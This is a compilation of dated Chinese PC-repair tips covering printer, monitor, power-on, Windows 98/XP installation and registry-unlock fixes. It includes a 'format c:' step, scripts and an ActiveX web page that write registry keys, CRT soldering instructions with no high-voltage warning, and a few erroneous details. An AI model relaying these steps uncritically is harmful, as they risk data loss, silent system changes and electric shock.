    打印机清洗泵嘴出毛病是较多的，也是造成堵头的主要因素之一。打印机清洗泵嘴对打印机喷头的保护起决定性作用。喷头小车回位后，要由清洗泵嘴对喷头进行弱抽气处理，对喷头进行密封保护。在打印机安装新墨盒或喷嘴有断线时，机器下端的抽吸泵要通过它对喷头进行抽气，此嘴的工作精度越高越好。但在实际使用中，它的性能及气密性会因时间的延长、灰尘及墨水在此嘴的残留凝固物增加而降低。如果使用者不对其经常进行检查或清洗，它会使你的打印机喷头不断出些故障。

    养护此部件的方法：将打印机的上盖卸下移开小车，用针管吸入纯净水对其进行冲洗，特别要对嘴内镶嵌的微孔垫片充分清洗。在此要特别提醒用户，清洗此部件时，千万不能用乙醇或甲醇对其进行清洗，这样会造成此组件中镶嵌的微孔垫片溶解变形。另外要提的是，喷墨打印机要尽量远离高温及灰尘的工作环境，只有良好的工作环境才能保证机器长久正常的使用。

常见故障五：检测墨线正常而打印精度明显变差的处理

    喷墨打印机在使用中会因使用的次数及时间的延长而打印精度逐渐变差。喷墨打印机喷头也是有寿命的。一般一只新喷头从开始使用到寿命完结，如果不出什么故障较顺利的话，也就是20-40个墨盒的用量寿命。如果你的打印机已使用很久，现在的打印精度变差，你可以用更换墨盒的方法来试试，如果换了几个墨盒，其输出打印的结果都一样，那么你这台打印机的喷头将要更换了。如果更换墨盒以后有变化，说明可能你使用的墨盒中有质量较差的非原装墨水。

    如果打印机是新的，打印的结果不能令你满意，经常出现打印线段不清晰、文字图形歪斜、文字图形外边界模糊、打印出墨控制同步精度差，这说明你可能买到的是假墨盒或者使用的墨盒是非原装产品，应当对其立即更换。

常见故障六：行走小车错位碰头的处理

    喷墨打印机行走小车的轨道是由两只粉末合金铜套与一根圆钢轴的精密结合来滑动完成的。虽然行走小车上设计安装有一片含油毡垫以补充轴上润滑油，但因我们生活的环境中到处都有灰尘，时间一久，会因空气的氧化，灰尘的破坏使轴表面的润滑油老化而失效，这时如果继续使用打印机，就会因轴与铜套的摩擦力增大而造成小车行走错位，直至碰撞车头造成无法使用。

    解决的办法是：一旦出现此故障应立即关闭打印机电源，用手将未回位的小车推回停车位。找一小块海绵或毡，放在缝纫机油里浸饱油，用镊子夹住在主轴上来回擦。最好是将主轴拆下来，洗净后上油，这样的效果最好。

    另一种小车碰头是因为器件损坏所致。打印机小车停车位的上方有一只光电传感器，它是向打印机主板提供打印小车复位信号的重要元件。此元件如果因灰尘太大或损坏，打印机的小车会因找不到回位信号碰到车头，而导致无法使用，一般出此故障时需要更换器件。

显示器
    显示器用的时间长了，各种小毛病就会接踵而来。专家认为，要解决这些小毛病实际上很简单，用一双眼睛就可以看出故障的所在。
常见故障一：电脑刚开机时显示器的画面抖动得很厉害，有时甚至连图标和文字也看不清，但过一二分钟之后就会恢复正常。

    这种现象多发生在潮湿的天气，是显示器内部受潮的缘故。要彻底解决此问题，可使用食品包装中的防潮砂用棉线串起来，然后打开显示器的后盖，将防潮砂挂于显象管管颈尾部*近管座附近。这样，即使是在潮湿的天气里，也不会再出现以上的“毛病”。

常见故障二：电脑开机后，显示器只闻其声不见其画，漆黑一片。要等上几十分钟以后才能出现画面。
    这是显象管座漏电所致，须更换管座。拆开后盖可以看到显象管尾的一块小电路板，管座就焊在电路板
上。小心拔下这块电路板，再焊下管座，到电子商店买回一个同样的管座，然后将管座焊回到电路板上。这时不要急于将电路板装回去，要先找一小块砂纸，很小心地将显象管尾后凸出的管脚用砂纸擦拭干净。特别是要注意管脚上的氧化层，如果擦得不干净很快就会旧病复发。将电路板装回去就大功告成。

常见故障三：显示器屏幕上总有挥之不去的干扰杂波或线条，而且音箱中也有令人讨厌的杂音。

    这种现象多半是电源的抗干扰性差所致。如果懒得动手，可以更换一个新的电源。如果有足够的动手能
力，也可以试着自己更换电源内滤波电容，这往往都能奏效；如果效果不太明显，可以将开关管一并换下
来。

常见故障四：显示器花屏。

    这问题较多是显卡引起的。如果是新换的显卡，则可能是卡的质量不好或不兼容，再有就是还没有安装正确的驱动程序。如果是旧卡而加了显存的话，则有可能是新加进的显存和原来的显存型号参数不一所致。

常见故障五：显示器黑屏。

    如果是显卡损坏或显示器断线等原因造成没有信号传送到显示器，则显示器的指示灯会不停地闪烁提示没有接收到信号。要是将分辨率设得太高，超过显示器的最大分辨率也会出现黑屏，重者销毁显示器，但现在的显示器都有保护功能，当分辨率超出设定值时会自动保护。另外，硬件冲突也会引起黑屏。


计算机无法加电是何故

《一键清理系统垃圾》

计算机无法加电是何故

    表弟最近让我帮他买台二手电脑，我想起来朋友升级以后送给我的旧主板还扔在墙角一边没有用呢，不如去电脑城买个旧硬盘和CPU攒台电脑凑合用。说到做到，花了不到500元，把缺的配件都配齐了。将电脑与市电正确相连，按下主机电源开关后发现电源指示灯不亮，主板无法正常加电。反复尝试均不起作用。

    首先检查电脑内外的连线，结果一切正常。接下来怀疑这个仅花了20块钱淘来的ATX电源有毛病，用导线短接电源接口的绿线和黑线，发现电源风扇呼呼直转；用万用表交流电压的250V挡检查电压输出，发现输出电压为200V左右，由此可见并不是电源输出电压过低造成的，电源的嫌疑也被排除了。莫非是显卡或者内存的毛病？不会啊，TNT2显卡虽然老了一点，但却是正在服役时从我的电脑上“退役”下来的，绝对没有任何毛病。再看内存，拆下来换上我的电脑上的好内存，还是无法加电开机。怪了，难道机箱变形、按键失灵？顿时我的脑中胡思乱想起来。看来只有使出最后一招了，将配件从机箱中取出放在工作台上并采用系统最小化（只保留电源、主板、CPU、内存、显卡和显示器）方法进行检测，结果故障依旧。

    把插卡类的配件都替换了一遍，问题还是没有解决。只有主板没换了，看来是主板出毛病啦！这块主板是精英的，芯片组为SiS730，支持赛扬系列CPU，算是前两年相当流行的主板了。朋友在升级之前用得好好的，送给我之后一直就扔在那儿有三四个月了。将主板取下来之后拿放大镜仔细观察并没有发现有虚焊或烧毁的地方。联想到使用时间已经有几年了，难道是主板电池没电了？将电池取下后用万用表测量发现电压已不足1V。更换之后，电脑终于能够正常加电，此后格式化硬盘、安装系统一路顺畅。


教你如何安装操作系统？

《一键清理系统垃圾》

教你如何安装操作系统？

seiyas
版主

--------------------------------------------------------------------------------

我要安装的是WINDOWS98的系统，请问如何安装，还有如何安装网卡，如何设置能连接到互联网，如何安装显卡，如何安装声卡，安装之后如何用『转贴』

一、准备工作:
1.准备好Microsoft Windows 98 安装光盘。
2.可能的情况下，在运行安装程序前用磁盘扫描程序扫描所有硬盘检查硬盘错误并进行修复，否则安装程序运行时如检查到有硬盘错误即会很麻烦。
3.如果安装过程中需要用产品密匙(安装序列号)的，用纸张记录安装文件的产品密匙(安装序列号)。
4.可能的情况下，用驱动程序备份工具(如:驱动精灵 2004 V1.9 Beta.exe)将Windows 98下的所有驱动程序备份到硬盘上(如∶F:\Drive)。最好能上网下载本机的网卡驱动和调制解调器等的驱动程序，如果你用宽带连接请下载并保存宽带拨号软件Enternet300,能上网就能找到大部分所要的软件。
5.如果你想在安装过程中格式化C盘(建议安装过程中格式化C盘)，请备份C盘有用的数据。
6.必须有FAT或FAT32文件系统格式的活动分区,Windows 98亦只能安装在FAT或FAT32文件系统格式的分区,推荐分区空间大于2G

二、用光盘启动系统:
(如果你已经知道方法请转到下一步),将98安装光盘放入光驱,重新启动系统并把光驱设为第一启动盘,保存设置并重启,如无意外即可见到安装界面 ,如果你不知道具体做法请参考与这相同的-->如何进入纯DOS系统:

三、安装Windows 98
光盘自启动后,如无意外即可见到启动界面 ,将出现如下图1所示,如光盘不能自启动,可用98启动软盘启动(设软驱为第一启动盘)。

如果你想格式化C盘,即选第二项进入DOS下,在提示符“A:\>_”下输入“format c:”后回车,再输入“y”后回车即开如格式化C盘！
在这里我已经格式化C盘了,所以选第一项(从光盘安装98)后直接回车,很快出现如下图2所示,(如果不选择在30秒后会自动启动第一项)。
0.一启动就可以用鼠标了,中文界面，点击“继续”按钮
0. 正在准备Windows 98 安装向导,很快结束
0. 许可协议当然是要接受啦！否则无法安装。用鼠标移动光标到“接受协议”前面的圆圈里点击一下使圆圈内多了一个黑点，然后点“下一步”
0.选择安装系统文件所用的目录，默认是安装在C:\WINDOWS，点“下一步”
装程序开始检查所有硬盘
0.开始检查磁盘中己安装的组件和准备安装系统所用目录
0.检查可用磁盘空间，检查磁盘错误。
0.要求你选择位置，默认选中国,点“下一步”
0.不论你是否想制作Windows 98启动盘，都要点“下一步”
0.如果你不想制作Windows 98启动盘请点击“取消”跳过这一步。建议你制作启动盘,请将取消了写保护的空白软盘放进软驱中，点击“确定”开始制作启动盘。
0.开始复制启动所需的文件，及系统文件，这个过程所用时间较长,你可以去休息了
0.系统将重新启动，启动时第一次出现Windows 98启动画面，启动完成后开始安装硬件，开始菜单，系统设置等等。其间会重新启动几次，你可以休息一下了，安装程序会自动完成余下的全部过程

四、结尾工作
1.安装驱动程序.相关驱动去"驱动之家"下载
http://www.mydrivers.com/
2.设置上网连接，上网升级系统，进行系统设置
3.安装杀毒软件，升级杀毒软件，装程序等。
概括起来，结尾工作所用的时间比安装所用的时间长很多。建议大多数用户，装完系统及程序后优化一下系统，然后用系统备份工具（如Ghost中文伴侣1.0正式版等）将整个C盘备份为一个镜像文件（镜像文件大小约为整个C盘文件大小的1/3至1/4左右），以后如果系统损坏就可以用不到10分钟时间来恢复一个同备份时一模一样的全新系统

2006-6-9 17:50:11　编辑 删除　IP：已记录

Re:教你如何安装操作系统？
seiyas
版主

角色：论坛版主
等级：侠之大者
公会：赛雅万维办公室
发帖：278
经验：487
金币：487
注册：2006年6月4日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.2

--------------------------------------------------------------------------------

如何安装系统（XP）

一、安装光盘光盘启动安装Windows XP
    Windows XP在升级安装上做得十分出色，它的安装方式同样有三种：升级安装、双系统共存安装和全新安装。我们可在以前的Windows 98/98 SE/Me/2000这些操作系统的基础上顺利升级到Windows XP。Windows XP的核心代码是基于Windows 2000的，所以从Windows 2000上进行升级安装自然十分容易。
   下面我们就来介绍一下Windows XP的安装。
    1. 在WINDOWS状态下放入光盘自动运行，讯问是否安装WINXP，用鼠标选择“Install Windows XP”。
    2. 选框里面可以选“升级（推荐）”和“新安装（高级）”。当语言版本不一致时，不能用“升级”，只能新安装。新安装不存在系统兼容性问题。
    3. 接受协议，输入注册码。
    4. 选择可支持其它东亚语种（Install support for East Asian languages），当然也包括中文。语种选择“Chinese（PRC）”。
    5. 点击第5步中的"Advanced Options"选项.
    6. 在"Copy installation files from this folder"所要求的文本框中输入安装的源目录；
    7. 在"To this folder on my hard drive"所要求的文本框中输入安装的目标目录，注意目标目录没有带驱动器号。如果想自己选安装在哪个驱动器号上，勾选下面的"I want to choose the install drive letter and partition during Setup"。
    8. "Copy all installation files from the Setup CD"是把安装盘上的文件拷贝到硬盘上。用光盘安装时它一般不会把安装源文件整个拷贝到硬盘，而是在安装时建立拷贝的文件列表，按列表拷贝。
    9. "I want to choose the install drive letter and partition during Setup"用于改变WINXP安装目录。
    10. 第5步中的"Accessibility Options"选项，即辅助选项（残疾人专用）。
    a) 选择"Use Microsoft Magnifier during Setup"是"使用微软放大镜"，字体会显示得很大。
    b) 选择"Use Microsoft Narrator during Setup"是"使用微软讲述者"，每步都有英文的语音提示，很清晰。
    11. 重启后，选择“TO set up Windows XP now，press ENTER”，即安装WINXP。
    12. 磁盘格式转换，选择"To convert the drive to NTFS,press C"即可将FAT（或FAT32）磁盘格式转换成NTFS格式，确认转换敲“C”。选择"To select a different partition for Windows XP，press ESC"可重新选分区（敲“ESC”）。
    13. 进入安装，正在复制文件，显示复制文件的进度。
    14. 文件复制完毕，进入磁盘格式转换，磁盘的格式被转换成NTFS。转换完毕后会重新启动一次，比不转换磁盘格式多一次重启。启后进行检测，并可见XP界面。
    15. 选择“区域和语言”。在安装英文版XP又想让它支持中文时，这个画面的选项比较重要。
    a) 上方的提示：将“标准和格式”设置为“英语（美国）”，“位置”设置为“美国”。如果想让英文的XP支持中文（在不装中文包的前提下），就要点“Customize”，然后把“标准和格式”设置成“Chinese Simplified（China PRC）”，位置设置成“China”。
    b) 中间的提示：文本输入默认语言和方法是美式键盘。如果要查看或改变，点“Details”，选中“为东亚语言安装文件”，英文XP才可以支持中文，上面的“区域和语言”里才可以选“中国”和“中文”。
    16. 输入名字和公司/组织名，注册时用。以后在右键点“我的电脑”并选“属性”时可以看到这些信息。
    17. “文字和输入语言”设置页，用于设置语言和输入法。
    18. 输入计算机名和系统管理员密码。XP正常启动时不使用管理员登录，只在“安全模式”时才出现（安全模式只有系统管理员才可以登录）。
    19. “日期和时间”设置：下面的下拉选框是选时区，在中国应该选“（GMT +08：00）北京 重庆 乌鲁木齐”。
    20. 网络设置：一般选“Typical settings（典型设置）”。如果需要其他协议如IPX、NetBEUI等，则点下面的“Custom settings（自定义）”。这个可以在以后的网络属性里改，并不需要在这里设置。
    21. 安装所选定的安装组件、帮助文件等等，以及安装[开始]菜单项目、注册组件、保存设置、删除用过的临时文件。重新启动后，进入WINXP的炫丽画面（需要设置WINDOWS XP）。
   22. 注册。一般选“现在不注册”。
   23. 输入使用这台计算机的用户名，这将出现在登录时的列表中。也可以在系统安装完毕后，在“控制面板—用户帐户”里添加。这里输入的用户名都有系统管理员的权限，而且没有密码，还需在“用户帐户”里创建密码和更改权限。至少应输入一个。建议只输入一个，以后再添加。

二、DOS下安装Windows XP
    这种情况可能是新买的电脑，或是Windows 系统无法进入。会选择在DOS下安装的。NT系统和9x系统不一样，它在DOS下的安装不像安装Windows 98一样，敲入setup.exe就可以了，而是先加载smartdrv.exe,然后运行/i386目录下的winnt.exe。
    具体操作方法如下：
    假设smartdrv.exe这个文件在A盘，光驱为G盘(注：这个文件在windows 9x的光盘上有或是 windows 9x系统的windows 目录下有)
a:\smartdrv.exe
a:\g:
g:\cd i386
g:\i386\winnt.exe
    这样就可以了，一定要记住加载smartdrv.exe不然，呵呵，你等上一个晚上也安装不完Windows XP.
    其它注意的问题----NTFS
    关于NTFS的选择，如果你想安装多个操作系统，请记住不要把C盘转化为NTFS。具体如关于NTFS和FAT32在FAT文件系统方面的区别，请察看其他文档，这里就不细说了。如果你不知道该不该把它转换为NTFS,一个简单的办法就是用FAT32,选择"不转换"。在你了解了NTFS后，在命令行模式下可用convert.exe这个可执行文件来随时转化的，如"convert c: /fs:ntfs"把c盘转化为NTFS。
    NTFS对于大多数普通用户来说，它的优点在于支持文件加密。Windows XP像Windows 2000 一样，支持多用户使用，而且它支持在不注销当前用户的情况下，切换到另外一个用户，这就是所谓的快速切换用户。用NTFS文件系统时，不同的用户可以加密自己的文档，而其他用户是无法访问的。比如，当前是pccat帐户登陆的，我加密了a.txt,然后快速切换到whislter用户登陆，whistler用户点击a.txt时，系统会提示你没有访问这个文件的权利的。对普通用户来说，NTFS的另外一个的优点就是它能够很好的支持大硬盘，且硬盘分配单元非常小，减少了磁盘碎片的产生。而且，大家熟悉的CIH病毒在NTFS文件系统下是没有办法传播的，使用NTFS的用户根本不需要理会CIH的，当然现在CIH早已失去了以前的威力，但是我想说的是NTFS文件系统比FAT32安全。
    DOS和Windows 9x系统不能访问NTFS，这也算是NTFS的安全特色，但也是它的一个缺点。比如很多朋友喜欢用GHOST软件备份系统，GHOST的备份程序在XP/NT下是不能运行的，必须在DOS下运行，而且文件放到FAT32分区上的，另外为了在某些紧急状态下访问一些文件，需要留一个分区为FAT32。总的来说，NTFS文件系统是一种不错的文件系统，推荐使用，至少你可以把你安装程序的分区转化为NTFS。当然，NTFS文件系统还有很多优点，如磁盘配额，磁盘压缩，有利于用户管理等等，不过我认为这些对于个人普通用户不是很重要的，那些主要是针对企业用户，域模式下的客户机和服务器的。
附表： NTFS文件格式
FAT32文件格式 FAT16文件格式
支持单个分区大于2G 支持单个分区大于2G 单个分区小于2G
支持磁盘配额 不支持磁盘配额 不支持磁盘配额
支持文件压缩（系统） 不支持文件压缩（系统） 不支持文件压缩（系统）
支持EFS文件加密系统 不支持EFS 不支持EFS
产生的磁盘碎片较少 产生的磁盘碎片适中 产生的磁盘碎片较多
适合于大磁盘分区 适合于中小磁盘分区 适合于小与2G的磁盘分区
WindowsNT系统支持9x系统不支持 NT4.0不支持，2000，xp,98，me都支持 NT,9x系统都支持
更多相关内容...
在WIN XP的开始菜单\运行中
你可运行命令：oobe/msoobe /a 就能看你的XP是否已激活。
中间有空格的 。复制过去用一下，两秒钟后就有结论。

三、从软盘启动 Windows XP
    1.先到微软网站
    http://www.microsoft.com/downloads/http://www.microsoft.com/downloads/ ;release.asp?releaseid=33494去下载一个4M多的XP启动盘制作程序.
    2.把刚刚做好的启动盘中的做出第一张盘所有文件删掉（千万不要格式化）,保留所有隐含文件，因为我们只要软盘上的引导信息。
    3.把WinXP启动分区（通常是C盘）根目录下的Boot.INI、Bootsect.DOS、Ntdetect. COM、Ntldr和Bootfont.BIN这几个隐含的系统文件复制到软盘上，并把Ntldr文件名改成 Setuplde.BIN即可。
    现在只要用这张“XP启动盘”就可以启动WinXP了。

四、Windows XP 安装光盘集成SP补丁包
这里以Windows XP SP1为例
    1、首先下载SP1，官方的下载地址是： http://download.microsoft.com/downl...p1_cn_x86.exehttp://download.microsoft.com/downl...p1_cn_x86.exe；
    2、得到文件xpsp1_cn_x86.exe后，不要双击进行安装，用WinRAR将其解压到某一目录，如：H:\sp1；
    3、将Windows XP的安装文件复制到一目录中，比如：H:\winxp；
    4、点击“开始”→“运行”，在对话框中输入“h:\sp1\update\update -s:h:\winxp”，点击“确定”；
    5、这时程序自动把SP1的更新信息集成到Windows XP的安装程序中；
    6、双击“H:\winxp\setup.exe”，然后点击“安装Microsoft Windows XP”，进行全新安装（不要害怕，你原来安装的程序不会丢失的）；
    7、按默认提示安装，会出现尝试性恢复Windows XP，按R进行尝试性恢复，然后自动重启，并重新进入尝试性恢复界面，再按一下R进行尝试性恢复，以下一直按默认安装下去；
    8、最终安装成功，连激活都不需要，以前安装的程序安然无恙，系统属性中显示“版本 2002 Service Pack 1”。
    你也可以将第5步中集成SP1的Windows XP的安装程序刻成光盘，以后安装Windows XP时就不需要另行升级了。

2006-6-9 17:52:44　编辑 删除　IP：已记录

Re:教你如何安装操作系统？
seiyas
版主

角色：论坛版主
等级：侠之大者
公会：赛雅万维办公室
发帖：278
经验：487
金币：487
注册：2006年6月4日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.3

--------------------------------------------------------------------------------

如何安装双系统

最近许多网友在问如何安装双系统，现用图解的方式来作以说明。1、安装前的准备与策略提示：由于Windows98和DOS都不支持NTFS分区格式，所以为了方便起见，先将所有的分区均格式化成FAT32文件系统。假设现在你的硬盘上什么也没有，以我刚刚格式化完的20GB硬盘为例，使用最传统的方法：开机→软盘启动→使用Fdisk分区→format格式化，将其划分为C、D、E、F四个逻辑分区，各分区大小及用途建议如下：C区，4GB，安装Windows98系统；
D区，5GB，安装WindowsXP系统；
E区，4GB，安装办公软件以及存放学习资料；
F区，7GB，这个稍微大点，用于安装一般的应用程序以及游戏软件。提示：我们一般都将Windows98安装在C盘，而将WindowsXP安装在D盘，为什么不能将WindowsXP与Windows98安装在同一个盘呢？这是因为WindowsXP的系统目录也是Windows，与Windows98同在一个盘的话会覆盖掉Windows98下的某些系统文件，导致Windows98的不可使用，这一点请注意，千万不能将Windows98和WindowsXP安装在同一个分区下。2、安装Windows98提示：要将Windows98/Me/NT/2000等系统与WindowsXP实现多系统共存的话，应当先安装Windows98/Me/NT/2000系统，最后才安装WindowsXP，这样，WindowsXP才能够识别出上述系统并建立多系统引导菜单。如果您颠倒了安装的顺序，先安装了WindowsXP，再安装Windows98或其他系统，您将会遇到很大的麻烦，甚至导致WindowsXP无法正常使用，请务必记住这一点。安装Windows98的方法很简单，先是设置从光盘启动，将Windows98的安装光盘放进CD-ROM，按照提示一步一步地安装，大家早有接触，不再多说。好，现在你的C盘上已经有了一个Windows98系统，下面重点介绍如何在此基础上安装WindowsXP。3、安装WindowsXP请按图示一步步操作。安装WindowsXPscreen.width-333)this.width=screen.width-333"border=0>启动计算机，进入Windows98，将WindowsXP的安装光盘放入CD－ROM，系统会自动引导光盘，出现如图1所示的画面，选择最上面的一项“安装MicrosoftWindowsXP”。screen.width-333)this.width=screen.width-333"border=0>注意：这一步很重要，选择安装类型，由于要保留原有的Windows98系统，所以应该在下拉列表中选择“全新安装（高级）”。screen.width-333)this.width=screen.width-333"border=0>点击“下一步”按钮，选择“我接受这个协议”，继续点击“下一步”，输入“产品密钥”（在WindowsXP安装光盘包装合上），输入后点击“下一步”。screen.width-333)this.width=screen.width-333"border=0>选择主要使用的语言和区域，在下拉列表中选择“中文（中国）”，其他可以按照默认的设置。screen.width-333)this.width=screen.width-333"border=0>到了为WindowsXP所在的分区选择文件系统格式的时候了，如果想提高数据的安全性，就选择“是，升级驱动器”，将该分区格式化成NTFS格式，如果想在Windows98和DOS下都能访问该分区，就选择“否，跳过此步骤”，保留原有的FAT32格式。我们推荐保留FAT32格式。

screen.width-333)this.width=screen.width-333"border=0>点击“下一步”，WindowsXP要检查你的光盘文件是否更新，不必检查，选择“否，跳过这一步继续安装Windows”。screen.width-333)this.width=screen.width-333"border=0>开始安装WindowsXP！，接下来只要按照提示去做就能完成WindowsXP的安装，很容易掌握。其实，所谓的多系统安装就是这么简单。安装完成后，引导菜单会自动出现，让你选择是以Windows98启动还是以WindowsXP启动。当然，安装到这里并没有完成，还有一些必需的设置，这儿就不多说了


教你如何一步一步检修电脑硬件故障

《一键清理系统垃圾》

教你如何一步一步检修电脑硬件故障

    随着大家电脑应用水平的不断提高，有越来越多的朋友参加到了DIYer的队伍中来，自己动手组装一台电脑已非难事。可是一旦遇到电脑的硬件故障，很多初学者往往会觉得手足无措，搞不清楚故障的原因所在。笔者在排除电脑硬件故障的过程中总结了一些经验，整理成文与朋友们共享。

    事出有因 引发硬件故障的原因

    1． 硬件本身质量不佳。粗糙的生产工艺、劣质的制作材料、非标准的规格尺寸等都是引发故障的隐藏因素。由此常常引发板卡上元件焊点的虚焊脱焊、插接件之间接触不良、连接导线短路断路等故障。

    2． 人为因素影响。操作人员的使用习惯和应用水平也不容小觑，例如带电插拔设备、设备之间错误的插接方式、不正确的BIOS参数设置等均可导致硬件故障。

    3． 使用环境影响。这里的环境可以包括温度、湿度、灰尘、电磁干扰、供电质量等方面。每一方面的影响都是严重的，例如过高的环境温度无疑会严重影响设备的性能等等。

    4． 其他影响。由于设备的正常磨损和硬件老化也常常引发硬件故障。

    步步为营 检修硬件故障的步骤

    现在我们对硬件故障产生的原因有了一个大致的了解，那么应该如何检修这些故障呢？一般而言我们应该遵循以下原则:

    1． 先软件后硬件

    电脑发生故障后，一定要在排除软件方面的原因（例如系统注册表损坏、BIOS参数设置不当、硬盘主引导扇区损坏等）后再考虑硬件原因，否则很容易走弯路。

    2． 先外设后主机

    由于外设原因引发的故障往往比较容易发现和排除，可以先根据系统报错信息检查键盘、鼠标、显示器、打印机等外部设备的各种连线和本身工作状况。在排除外设方面的原因后，再来考虑主机。

    3． 先电源后部件

    作为电脑主机的动力源泉，电源的作用很关键。电源功率不足、输出电压电流不正常等都会导致各种故障的发生。因此，应该在首先排除电源的问题后再考虑其他部件。

    4． 先简单后复杂

    目前的电脑硬件产品并不像我们想象的那么脆弱、那么容易损坏。因此在遇到硬件故障时，应该从最简单的原因开始检查。如各种线缆的连接情况是否正常、各种插卡是否存在接触不良的情况等。在进行上述检查后而故障依旧，这时方可考虑部件的电路部分或机械部分存在较复杂的故障。

    对症下药 检修硬件故障的方法

    1． 软件排障

    由于软件设置方面的原因导致硬件无法工作很常见，这时我们可以采取的方法有：

    还原BIOS参数至缺省设置（开机后按[Del]键进入BIOS设置窗口→选中“Load Optimized Defaults”项→回车后按[Y]键确认→保存设置退出）；

    恢复注册表（开机后按[F8]键→在启动菜单中选择“Command prompt only”方式启动至纯DOS模式下→键入“scanreg /restore”命令→选择一个机器正常使用时的注册表备份文件进行恢复）；

    排除硬件资源冲突（右击[我的电脑]→[属性]→在[设备管理器]标签下找到并双击标有黄色感叹号的设备名称→在[资源]标签下取消“使用自动的设置”选项并单击[更改设置]按钮→找到并分配一段不存在冲突的资源）。

    2． 用诊断软件测试

    即使用专门检查、诊断硬件故障的工具软件来帮助查找故障的原因，如Norton Tools（诺顿工具箱）等。诊断软件不但能够检查整机系统内部各个部件（如CPU、内存、主板、硬盘等）的运行状况，还能检查整个系统的稳定性和系统工作能力。如果发现问题会给出详尽的报告信息，便于我们寻找故障原因和排除故障。

    3． 直接观察

    即通过看、听、摸、嗅等方式检查比较明显的故障。例如根据BIOS报警声或Debug卡判断故障发生的部位；观察电源内是否有火花、异常声音；检查各种插头是否松动、线缆是否破损、断线或碰线；电路板上的元件是否发烫、烧焦、断裂、脱焊虚焊；各种风扇是否运转正常等。有的故障现象时隐时现，可用橡皮榔头轻敲有关元件，观察故障现象的变化情况，以确定故障位置。

    4． 插拔替换

    初步确定发生故障的位置后，可将被怀疑的部件或线缆重新插拔，以排除松动或接触不良的原因。例如将板卡拆下后用橡皮擦擦拭金手指，然后重新插好；将各种线缆重新插拔等。如果经过插拔后不能排除故障，可使用相同功能型号的板卡替换有故障的板卡，以确定板卡本身已经损坏或是主板的插槽存在问题。然后根据情况更换板卡。

    5． 系统最小化

    最严重的故障是机器开机后无任何显示和报警信息，应用上述方法已无法判断故障产生的原因。这时我们可以采取最小系统法进行诊断，即只安装CPU、内存、显卡、主板。如果不能正常工作，则在这四个关键部件中采用替换法查找存在故障的部件。如果能正常工作，再接硬盘……以此类推，直到找出引发故障的罪魁祸首。

    以上是笔者对检修电脑硬件故障所作的一个大致总结。面对层出不穷的硬件故障，只要我们认真观察，冷静分析，细心操作，对于大部分故障都是可以自己解决的。相信技术与经验的沉淀也会使你逐渐成为一个高手的。


A盘不见的解决方法

《一键清理系统垃圾》

A盘不见的解决方法

1、先检查硬件，连线是否正确、完好；

2、检查在BIOS中禁用了软盘驱动器，在“Standard CMOS Features”中，发现“Drive A”是否被设置成了“NONE”？

3、“开始”---“运行”---输入“gpedit.msc”运行组策略，在“用户配置---管理模板---Windows组件---资源管理器”右侧窗口中，找到“隐藏‘我的电脑’中这些指定的驱动器”，双击，
在属性框中检查是否将“未配置”设为“已启用”了；
在下拉菜单中是否选择了“仅限制驱动器A和B”；


EXE文件关联丢失的解决方法

《一键清理系统垃圾》

EXE文件关联丢失的解决方法

1、修改regedit.exe 为 regedit.com
2、HKEY_CLASSES_ROOT\exefile\shell\open\command下的default,键值为"%1" %*。

另外，exe程序关联问题，在注册表下的HKEY_LOCAL_MACHINE\Software\Microsoft\windowsNT\currentVersion\winlogon
下面有个名为shell的子项，键值应为explorer.exe。


解开被锁定的.reg与.inf文件

《一键清理系统垃圾》

解开被锁定的.reg与.inf文件

    一、如果注册表编辑器未被锁定，可进入注册表编辑器，手动修改如下键值
    找到[HKEY_LOCAL_MACHINE\Softe\CLASSES\.reg]，将右边窗口中的“默认”字符串的值修改为“REGFILE”；

    找到[HKEY_LOCAL_MACHINE\Software\CLASSES\.inf]，将右边窗口中的“默认”字符串的值修改为“INFFILE”；

    二、如果注册表编辑器已被锁定
    1.用VBS文件解锁：

    打开记事本录入以下内容：

    Dim A

    Set A=CreateObject("WScript.Shell")

    A.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools","00000000","REG_DWORD"

    A.RegWrite"HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\","regfile"

    A.RegWrite"HKEY_LOCAL_MACHINE\Software\CLASSES\.inf\","inffile"

    输入完成后另存为UNLOCK.VBS，双击执行即可。

    2.用JS文件解锁：

    打开记事本录入以下内容：

    VAR:A=WScript.CreateObject("WScript.Shell")

    A.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools","00000000","REG_DWORD");

    A.RegWrite ("HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\","regfile");

    A.RegWrite ("HKEY_LOCAL_MACHINE\Software\CLASSES\.inf\","inffile");

    输入完成后另存为UNLOCK.jS，双击执行即可。　(辽宁 乔珊)

    1.在DOS下使用Regedit

    其实DOS下也可以解除这种锁定的。编辑好上面的文件后，点击“开始→程序→MS-DOS方式”，来到MS-DOS方式下，输入regedit c:\unlcok.reg，按回车。接着画面上会出现“您确定要增加c:\unlock.reg信息到注册表”的对话框，按“确定”按钮，unlock.reg的内容就输入注册表了。

    2.利用.htm文件

    打开记事本，输入下面的内容：

    ＜html＞

    ＜body＞

    ＜script language="JavaScript"＞

    var shl=new ActiveXObject("Wscript.shell");

    shl.RegWrite("HKLM\Software\CLASSES\.reg",regfile,"REG_SZ");

    shl.RegWrite("HKLM\Software\CLASSES\.inf",inffile,"REG_SZ");

    ＜/script＞

    ＜/body＞

    ＜/html＞

    保存为.htm文件，运行这个文件就可以解除锁定。

    3.利用超级兔子魔法设置

    运行超级兔子魔法设置，点击“安全与多用户”选项，再点击“安全”标签，将“禁止使用.reg文件”和“禁止使用.inf文件”前面的“√”取消，就可以解除这种锁定。

    4.利用scanreg文件

    在纯DOS下输入scanreg/restore命令，目的是恢复以前备份的注册表，如果你以前备份的注册表是没有锁定的，那么试试这招也很有用的。或者在纯DOS环境下输入命令scanreg，用Tab键选择“START”，进入后选择“View Backups”，即查看备份文件，根据日期选择最新的备份，然后选择RESTORE，这样注册表就可以恢复正常了。


部分软件无法安装

《一键清理系统垃圾》

部分软件无法安装

    问：最近我的Windows 2000系统在安装一部分软件时出现了问题，总是刚开始安装一会儿之后就出现如下提示：“安装程序启动安装引擎失败：不支持此接口”，重装系统后仍然出现这个问题，请问如何解决？

